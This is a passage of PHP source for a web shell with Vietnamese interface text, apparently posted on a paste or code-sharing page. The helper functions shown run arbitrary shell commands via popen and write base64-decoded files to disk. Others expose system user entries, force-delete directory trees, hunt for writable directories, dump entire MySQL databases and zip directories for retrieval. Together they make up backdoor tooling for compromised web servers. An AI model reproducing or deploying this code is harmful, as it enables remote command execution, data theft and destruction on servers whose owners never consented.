  1509. }elseif(@is_resource($f = @popen($cfe,"r"))) {
  1510. $res = '';
  1511. while(!@feof($f)) {
  1512. $res .= @fread($f,1024);
  1513. }
  1514. @pclose($f);
  1515. }
  1516. }
  1517. return $res;
  1518. }
  1519. function which($pr) {
  1520. $path = execute("which $pr");
  1521. return ($path ?$path : $pr);
  1522. }
  1523. function cf($fname,$text){
  1524. if($fp=@fopen($fname,'w')) {
  1525. @fputs($fp,@base64_decode($text));
  1526. @fclose($fp);
  1527. }
  1528. }
  1529. function debuginfo() {
  1530. global $starttime;
  1531. $mtime = explode(' ',microtime());
  1532. $totaltime = number_format(($mtime[1] +$mtime[0] -$starttime),6);
  1533. echo 'X&#7917; L&#253; Trong '.$totaltime.' Gi&#226;y(s)';
  1534. }
  1535. function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
  1536. if(!$link = @mysql_connect($dbhost.':'.$dbport,$dbuser,$dbpass)) {
  1537. p('<h2>Can not connect to MySQL server</h2>');
  1538. exit;
  1539. }
  1540. if($link &&$dbname) {
  1541. if (!@mysql_select_db($dbname,$link)) {
  1542. p('<h2>Database selected has error</h2>');
  1543. exit;
  1544. }
  1545. }
  1546. if($link &&mysql_get_server_info() >'4.1') {
  1547. if(in_array(strtolower($charset),array('gbk','big5','utf8'))) {
  1548. q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;",$link);
  1549. }
  1550. }
  1551. return $link;
  1552. }
  1553. function s_array(&$array) {
  1554. if (is_array($array)) {
  1555. foreach ($array as $k =>$v) {
  1556. $array[$k] = s_array($v);
  1557. }
  1558. }else if (is_string($array)) {
  1559. $array = stripslashes($array);
  1560. }
  1561. return $array;
  1562. }
  1563. function html_clean($content) {
  1564. $content = htmlspecialchars($content);
  1565. $content = str_replace("\n","<br />",$content);
  1566. $content = str_replace(" ","&nbsp;&nbsp;",$content);
  1567. $content = str_replace("\t","&nbsp;&nbsp;&nbsp;&nbsp;",$content);
  1568. return $content;
  1569. }
  1570. function getChmod($filepath){
  1571. return substr(base_convert(@fileperms($filepath),10,8),-4);
  1572. }
  1573. function getPerms($filepath) {
  1574. $mode = @fileperms($filepath);
  1575. if (($mode &0xC000) === 0xC000) {$type = 's';}
  1576. elseif (($mode &0x4000) === 0x4000) {$type = 'd';}
  1577. elseif (($mode &0xA000) === 0xA000) {$type = 'l';}
  1578. elseif (($mode &0x8000) === 0x8000) {$type = '-';}
  1579. elseif (($mode &0x6000) === 0x6000) {$type = 'b';}
  1580. elseif (($mode &0x2000) === 0x2000) {$type = 'c';}
  1581. elseif (($mode &0x1000) === 0x1000) {$type = 'p';}
  1582. else {$type = '?';}
  1583. $owner['read'] = ($mode &00400) ?'r': '-';
  1584. $owner['write'] = ($mode &00200) ?'w': '-';
  1585. $owner['execute'] = ($mode &00100) ?'x': '-';
  1586. $group['read'] = ($mode &00040) ?'r': '-';
  1587. $group['write'] = ($mode &00020) ?'w': '-';
  1588. $group['execute'] = ($mode &00010) ?'x': '-';
  1589. $world['read'] = ($mode &00004) ?'r': '-';
  1590. $world['write'] = ($mode &00002) ?'w': '-';
  1591. $world['execute'] = ($mode &00001) ?'x': '-';
  1592. if( $mode &0x800 ) {$owner['execute'] = ($owner['execute']=='x') ?'s': 'S';}
  1593. if( $mode &0x400 ) {$group['execute'] = ($group['execute']=='x') ?'s': 'S';}
  1594. if( $mode &0x200 ) {$world['execute'] = ($world['execute']=='x') ?'t': 'T';}
  1595. return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
  1596. }
  1597. function getUser($filepath) {
  1598. if (function_exists('posix_getpwuid')) {
  1599. $array = @posix_getpwuid(@fileowner($filepath));
  1600. if ($array &&is_array($array)) {
  1601. return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
  1602. }
  1603. }
  1604. return '';
  1605. }
  1606. function deltree($deldir) {
  1607. $mydir=@dir($deldir);
  1608. while($file=$mydir->read()) {
  1609. if((is_dir($deldir.'/'.$file)) &&($file!='.') &&($file!='..')) {
  1610. @chmod($deldir.'/'.$file,0777);
  1611. deltree($deldir.'/'.$file);
  1612. }
  1613. if (is_file($deldir.'/'.$file)) {
  1614. @chmod($deldir.'/'.$file,0777);
  1615. @unlink($deldir.'/'.$file);
  1616. }
  1617. }
  1618. $mydir->close();
  1619. @chmod($deldir,0777);
  1620. return @rmdir($deldir) ?1 : 0;
  1621. }
  1622. function bg() {
  1623. global $bgc;
  1624. return ($bgc++%2==0) ?'alt1': 'alt2';
  1625. }
  1626. function getPath($scriptpath,$nowpath) {
  1627. if ($nowpath == '.') {
  1628. $nowpath = $scriptpath;
  1629. }
  1630. $nowpath = str_replace('\\','/',$nowpath);
  1631. $nowpath = str_replace('//','/',$nowpath);
  1632. if (substr($nowpath,-1) != '/') {
  1633. $nowpath = $nowpath.'/';
  1634. }
  1635. return $nowpath;
  1636. }
  1637. function getUpPath($nowpath) {
  1638. $pathdb = explode('/',$nowpath);
  1639. $num = count($pathdb);
  1640. if ($num >2) {
  1641. unset($pathdb[$num-1],$pathdb[$num-2]);
  1642. }
  1643. $uppath = implode('/',$pathdb).'/';
  1644. $uppath = str_replace('//','/',$uppath);
  1645. return $uppath;
  1646. }
  1647. function getcfg($varname) {
  1648. $result = get_cfg_var($varname);
  1649. if ($result == 0) {
  1650. return 'No';
  1651. }elseif ($result == 1) {
  1652. return 'Yes';
  1653. }else {
  1654. return $result;
  1655. }
  1656. }
  1657. function getfun($funName) {
  1658. return (false !== function_exists($funName)) ?'Yes': 'No';
  1659. }
  1660. function GetList($dir){
  1661. global $dirdata,$j,$nowpath;
  1662. !$j &&$j=1;
  1663. if ($dh = opendir($dir)) {
  1664. while ($file = readdir($dh)) {
  1665. $f=str_replace('//','/',$dir.'/'.$file);
  1666. if($file!='.'&&$file!='..'&&is_dir($f)){
  1667. if (is_writable($f)) {
  1668. $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
  1669. $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
  1670. $dirdata[$j]['dirchmod']=getChmod($f);
  1671. $dirdata[$j]['dirperm']=getPerms($f);
  1672. $dirdata[$j]['dirlink']=ue($dir);
  1673. $dirdata[$j]['server_link']=$f;
  1674. $dirdata[$j]['client_link']=ue($f);
  1675. $j++;
  1676. }
  1677. GetList($f);
  1678. }
  1679. }
  1680. closedir($dh);
  1681. clearstatcache();
  1682. return $dirdata;
  1683. }else {
  1684. return array();
  1685. }
  1686. }
  1687. function qy($sql) {
  1688. $res = $error = '';
  1689. if(!$res = @mysql_query($sql)) {
  1690. return 0;
  1691. }else if(is_resource($res)) {
  1692. return 1;
  1693. }else {
  1694. return 2;
  1695. }
  1696. return 0;
  1697. }
  1698. function q($sql) {
  1699. return @mysql_query($sql);
  1700. }
  1701. function fr($qy){
  1702. mysql_free_result($qy);
  1703. }
  1704. function sizecount($size) {
  1705. if($size >1073741824) {
  1706. $size = round($size / 1073741824 * 100) / 100 .' G';
  1707. }elseif($size >1048576) {
  1708. $size = round($size / 1048576 * 100) / 100 .' M';
  1709. }elseif($size >1024) {
  1710. $size = round($size / 1024 * 100) / 100 .' K';
  1711. }else {
  1712. $size = $size .' B';
  1713. }
  1714. return $size;
  1715. }
  1716. class PHPZip{
  1717. var $out='';
  1718. function PHPZip($dir) {
  1719. if (@function_exists('gzcompress')) {
  1720. $curdir = getcwd();
  1721. if (is_array($dir)) $filelist = $dir;
  1722. else{
  1723. $filelist=$this ->GetFileList($dir);
  1724. foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
  1725. }
  1726. if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
  1727. else chdir($curdir);
  1728. if (count($filelist)>0){
  1729. foreach($filelist as $filename){
  1730. if (is_file($filename)){
  1731. $fd = fopen ($filename,'r');
  1732. $content = @fread ($fd,filesize($filename));
  1733. fclose ($fd);
  1734. if (is_array($dir)) $filename = basename($filename);
  1735. $this ->addFile($content,$filename);
  1736. }
  1737. }
  1738. $this->out = $this ->file();
  1739. chdir($curdir);
  1740. }
  1741. return 1;
  1742. }
  1743. else return 0;
  1744. }
  1745. function GetFileList($dir){
  1746. static $a;
  1747. if (is_dir($dir)) {
  1748. if ($dh = opendir($dir)) {
  1749. while ($file = readdir($dh)) {
  1750. if($file!='.'&&$file!='..'){
  1751. $f=$dir .'/'.$file;
  1752. if(is_dir($f)) $this->GetFileList($f);
  1753. $a[]=$f;
  1754. }
  1755. }
  1756. closedir($dh);
  1757. }
  1758. }
  1759. return $a;
  1760. }
  1761. var $datasec = array();
  1762. var $ctrl_dir = array();
  1763. var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
  1764. var $old_offset = 0;
  1765. function unix2DosTime($unixtime = 0) {
  1766. $timearray = ($unixtime == 0) ?getdate() : getdate($unixtime);
  1767. if ($timearray['year'] <1980) {
  1768. $timearray['year'] = 1980;
  1769. $timearray['mon'] = 1;
  1770. $timearray['mday'] = 1;
  1771. $timearray['hours'] = 0;
  1772. $timearray['minutes'] = 0;
  1773. $timearray['seconds'] = 0;
  1774. }
  1775. return (($timearray['year'] -1980) <<25) |($timearray['mon'] <<21) |($timearray['mday'] <<16) |
  1776. ($timearray['hours'] <<11) |($timearray['minutes'] <<5) |($timearray['seconds'] >>1);
  1777. }
  1778. function addFile($data,$name,$time = 0) {
  1779. $name = str_replace('\\','/',$name);
  1780. $dtime = dechex($this->unix2DosTime($time));
  1781. $hexdtime = '\x'.$dtime[6] .$dtime[7]
  1782. .'\x'.$dtime[4] .$dtime[5]
  1783. .'\x'.$dtime[2] .$dtime[3]
  1784. .'\x'.$dtime[0] .$dtime[1];
  1785. eval('$hexdtime = "'.$hexdtime .'";');
  1786. $fr = "\x50\x4b\x03\x04";
  1787. $fr .= "\x14\x00";
  1788. $fr .= "\x00\x00";
  1789. $fr .= "\x08\x00";
  1790. $fr .= $hexdtime;
  1791. $unc_len = strlen($data);
  1792. $crc = crc32($data);
  1793. $zdata = gzcompress($data);
  1794. $c_len = strlen($zdata);
  1795. $zdata = substr(substr($zdata,0,strlen($zdata) -4),2);
  1796. $fr .= pack('V',$crc);
  1797. $fr .= pack('V',$c_len);
  1798. $fr .= pack('V',$unc_len);
  1799. $fr .= pack('v',strlen($name));
  1800. $fr .= pack('v',0);
  1801. $fr .= $name;
  1802. $fr .= $zdata;
  1803. $fr .= pack('V',$crc);
  1804. $fr .= pack('V',$c_len);
  1805. $fr .= pack('V',$unc_len);
  1806. $this ->datasec[] = $fr;
  1807. $new_offset = strlen(implode('',$this->datasec));
  1808. $cdrec = "\x50\x4b\x01\x02";
  1809. $cdrec .= "\x00\x00";
  1810. $cdrec .= "\x14\x00";
  1811. $cdrec .= "\x00\x00";
  1812. $cdrec .= "\x08\x00";
  1813. $cdrec .= $hexdtime;
  1814. $cdrec .= pack('V',$crc);
  1815. $cdrec .= pack('V',$c_len);
  1816. $cdrec .= pack('V',$unc_len);
  1817. $cdrec .= pack('v',strlen($name) );
  1818. $cdrec .= pack('v',0 );
  1819. $cdrec .= pack('v',0 );
  1820. $cdrec .= pack('v',0 );
  1821. $cdrec .= pack('v',0 );
  1822. $cdrec .= pack('V',32 );
  1823. $cdrec .= pack('V',$this ->old_offset );
  1824. $this ->old_offset = $new_offset;
  1825. $cdrec .= $name;
  1826. $this ->ctrl_dir[] = $cdrec;
  1827. }
  1828. function file() {
  1829. $data = implode('',$this ->datasec);
  1830. $ctrldir = implode('',$this ->ctrl_dir);
  1831. return $data .$ctrldir .$this ->eof_ctrl_dir .pack('v',sizeof($this ->ctrl_dir)) .pack('v',sizeof($this ->ctrl_dir)) .pack('V',strlen($ctrldir)) .pack('V',strlen($data)) ."\x00\x00";
  1832. }
  1833. }
  1834. function sqldumptable($table,$fp=0) {
  1835. $tabledump = "DROP TABLE IF EXISTS $table;\n";
  1836. $tabledump .= "CREATE TABLE $table (\n";
  1837. $firstfield=1;
  1838. $fields = q("SHOW FIELDS FROM $table");
  1839. while ($field = mysql_fetch_array($fields)) {
  1840. if (!$firstfield) {
  1841. $tabledump .= ",\n";
  1842. }else {
  1843. $firstfield=0;
  1844. }
  1845. $tabledump .= " $field[Field] $field[Type]";
  1846. if (!empty($field["Default"])) {
  1847. $tabledump .= " DEFAULT '$field[Default]'";
  1848. }
  1849. if ($field['Null'] != "YES") {
  1850. $tabledump .= " NOT NULL";
  1851. }
  1852. if ($field['Extra'] != "") {
  1853. $tabledump .= " $field[Extra]";
  1854. }
  1855. }
  1856. fr($fields);
  1857. $keys = q("SHOW KEYS FROM $table");
  1858. while ($key = mysql_fetch_array($keys)) {
  1859. $kname=$key['Key_name'];
  1860. if ($kname != "PRIMARY"&&$key['Non_unique'] == 0) {
  1861. $kname="UNIQUE|$kname";
  1862. }
  1863. if(!is_array($index[$kname])) {
  1864. $index[$kname] = array();
  1865. }
  1866. $index[$kname][] = $key['Column_name'];
  1867. }
  1868. fr($keys);
  1869. while(list($kname,$columns) = @each($index)) {
  1870. $tabledump .= ",\n";
  1871. $colnames=implode($columns,",");
  1872. if ($kname == "PRIMARY") {
  1873. $tabledump .= " PRIMARY KEY ($colnames)";
  1874. }else {
  1875. if (substr($kname,0,6) == "UNIQUE") {
  1876. $kname=substr($kname,7);
  1877. }
  1878. $tabledump .= " KEY $kname ($colnames)";
  1879. }
  1880. }
  1881. $tabledump .= "\n);\n\n";
  1882. if ($fp) {
  1883. fwrite($fp,$tabledump);
  1884. }else {
  1885. echo $tabledump;
  1886. }
  1887. $rows = q("SELECT * FROM $table");
  1888. $numfields = mysql_num_fields($rows);
  1889. while ($row = mysql_fetch_array($rows)) {
  1890. $tabledump = "INSERT INTO $table VALUES(";
  1891. $fieldcounter=-1;
  1892. $firstfield=1;
  1893. while (++$fieldcounter<$numfields) {
  1894. if (!$firstfield) {
  1895. $tabledump.=", ";
  1896. }else {
  1897. $firstfield=0;
  1898. }
  1899. if (!isset($row[$fieldcounter])) {
  1900. $tabledump .= "NULL";
  1901. }else {
  1902. $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
  1903. }
  1904. }
  1905. $tabledump .= ");\n";
  1906. if ($fp) {
  1907. fwrite($fp,$tabledump);
  1908. }else {
  1909. echo $tabledump;
  1910. }
  1911. }
  1912. fr($rows);
  1913. if ($fp) {
  1914. fwrite($fp,"\n");
  1915. }else {
  1916. echo "\n";
  1917. }
  1918. }
  1919. function ue($str){
  1920. return urlencode($str);
  1921. }
  1922. function p($str){
  1923. echo $str."\n";
  1924. }
  1925. function tbhead() {
  1926. p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
  1927. }
  1928. function tbfoot(){
  1929. p('</table>');
  1930. }
  1931. function makehide($name,$value=''){
  1932. p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
  1933. }
  1934. function makeinput($arg = array()){
  1935. $arg['size'] = $arg['size'] >0 ?"size=\"$arg[size]\"": "size=\"100\"";
  1936. $arg['extra'] = $arg['extra'] ?$arg['extra'] : '';
  1937. !$arg['type'] &&$arg['type'] = 'text';
  1938. $arg['title'] = $arg['title'] ?$arg['title'].'<br />': '';
  1939. $arg['class'] = $arg['class'] ?$arg['class'] : 'input';
  1940. if ($arg['newline']) {
  1941. p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
  1942. }else {
  1943. p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
  1944. }
  1945. }
  1946. function makeselect($arg = array()){
  1947. if ($arg['onchange']) {
  1948. $onchange = 'onchange="'.$arg['onchange'].'"';
  1949. }
  1950. $arg['title'] = $arg['title'] ?$arg['title'] : '';
  1951. if ($arg['newline']) p('<p>');
  1952. p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
  1953. if (is_array($arg['option'])) {
  1954. foreach ($arg['option'] as $key=>$value) {
  1955. if ($arg['selected']==$key) {
  1956. p("<option value=\"$key\" selected>$value</option>");
  1957. }else {
  1958. p("<option value=\"$key\">$value</option>");
  1959. }
  1960. }
  1961. }
  1962. p("</select>");
  1963. if ($arg['newline']) p('</p>');
  1964. }
  1965. function formhead($arg = array()) {
  1966. !$arg['method'] &&$arg['method'] = 'post';
  1967. !$arg['action'] &&$arg['action'] = $self;
  1968. $arg['target'] = $arg['target'] ?"target=\"$arg[target]\"": '';
  1969. !$arg['name'] &&$arg['name'] = 'form1';
  1970. p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
  1971. if ($arg['title']) {
  1972. p('<h2>'.$arg['title'].' &raquo;</h2>');
  1973. }
  1974. }
  1975. function maketext($arg = array()){
  1976. !$arg['cols'] &&$arg['cols'] = 100;
  1977. !$arg['rows'] &&$arg['rows'] = 25;
  1978. $arg['title'] = $arg['title'] ?$arg['title'].'<br />': '';
  1979. p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
  1980. }
  1981. function formfooter($name = ''){
  1982. !$name &&$name = 'submit';
  1983. p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="L&#432;u File"></p>');
  1984. p('</form>');
  1985. }
  1986. function formfoot(){
  1987. p('</form>');
  1988. }
  1989. function pr($a) {
  1990. echo '<pre>';
  1991. print_r($a);
  1992. echo '</pre>';
  1993. };echo '
  1994. ';
  1995. ?>

comments powered by Disqus